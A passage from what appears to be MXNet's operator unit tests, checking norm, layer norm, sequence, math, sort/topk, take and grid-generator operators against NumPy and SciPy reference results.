out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order is 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order is 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order is 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
with environment('MXNET_SAFE_ACCUMULATION', enforce_safe_acc):
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@pytest.mark.skip(reason="Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev._bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test._bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test._bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x._bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s._bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, rtol=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b._simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
def test_take_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
@pytest.mark.parametrize('mode,out_of_range', [
('clip', True),
('wrap', True),
('raise', False)
])
@pytest.mark.parametrize('data_ndim', range(1, 5))
@pytest.mark.parametrize('idx_ndim', range(1, 4))
def test_take(mode, out_of_range, data_ndim, idx_ndim):
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result._simple_bind(default_context(), a=data_shape,
indices=idx_shape)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0]
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est)
# check addto
exe = grid._simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid._simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid._simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
